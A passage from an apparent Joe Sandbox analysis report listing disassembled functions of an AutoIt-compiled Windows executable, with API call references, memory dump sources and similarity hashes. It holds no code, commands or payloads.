                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                              • String ID: @COM_EVENTOBJ
                                                                                              • API String ID: 327565842-2228938565
                                                                                              • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                              • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                              • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                              • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                              Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                              • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                              • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                              • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                              • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                                • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                                • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                              • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                              • String ID: H
                                                                                              • API String ID: 3613100350-2852464175
                                                                                              • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                              • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                              • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                              • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                              Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                              • String ID:
                                                                                              • API String ID: 1291720006-3916222277
                                                                                              • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                              • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                              • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                              • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                              Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                              • IsMenu.USER32(?), ref: 0045FC5F
                                                                                              • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                              • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                              • String ID: 0$2
                                                                                              • API String ID: 93392585-3793063076
                                                                                              • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                              • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                              • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                              • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                              Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                              • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                              • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                              • String ID: crts
                                                                                              • API String ID: 586820018-3724388283
                                                                                              • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                              • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                              • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                              • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                              Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                              • _wcscat.LIBCMT ref: 0044BCAF
                                                                                              • _wcslen.LIBCMT ref: 0044BCBB
                                                                                              • _wcslen.LIBCMT ref: 0044BCD1
                                                                                              • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                              • String ID: \*.*
                                                                                              • API String ID: 2326526234-1173974218
                                                                                              • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                              • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                              • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                              • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                              Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                              • _wcslen.LIBCMT ref: 004335F2
                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                              • GetLastError.KERNEL32 ref: 0043362B
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                              • _wcsrchr.LIBCMT ref: 00433666
                                                                                                • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                              • String ID: \
                                                                                              • API String ID: 321622961-2967466578
                                                                                              • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                              • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                              • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                              • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                              Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsnicmp
                                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                              • API String ID: 1038674560-2734436370
                                                                                              • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                              • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                              • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                              • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                                              Function 00434034 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                                              • LoadStringW.USER32(00000000), ref: 00434060
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                              • LoadStringW.USER32(00000000), ref: 00434078
                                                                                              • _wprintf.LIBCMT ref: 004340A1
                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                              Strings
                                                                                              • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModuleString$Message_wprintf
                                                                                              • String ID: %s (%d) : ==> %s: %s %s
                                                                                              • API String ID: 3648134473-3128320259
                                                                                              • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                              • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                              • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                              • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                              Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                              • __lock.LIBCMT ref: 00417981
                                                                                                • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                              • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                              • __lock.LIBCMT ref: 004179A2
                                                                                              • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                              • String ID: KERNEL32.DLL$pI
                                                                                              • API String ID: 637971194-197072765
                                                                                              • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                              • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                              • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                              • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                              Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 1938898002-0
                                                                                              • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                              • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                              • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                              • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                              Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                              • _memmove.LIBCMT ref: 0044B555
                                                                                              • _memmove.LIBCMT ref: 0044B578
                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 2737351978-0
                                                                                              • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                              • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                              • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                              • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                              Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                              • __calloc_crt.LIBCMT ref: 00415246
                                                                                              • __getptd.LIBCMT ref: 00415253
                                                                                              • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                              • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                              • _free.LIBCMT ref: 0041529E
                                                                                              • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                              • String ID:
                                                                                              • API String ID: 3638380555-0
                                                                                              • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                              • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                                                                              • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                                                                              • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                                                                              Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
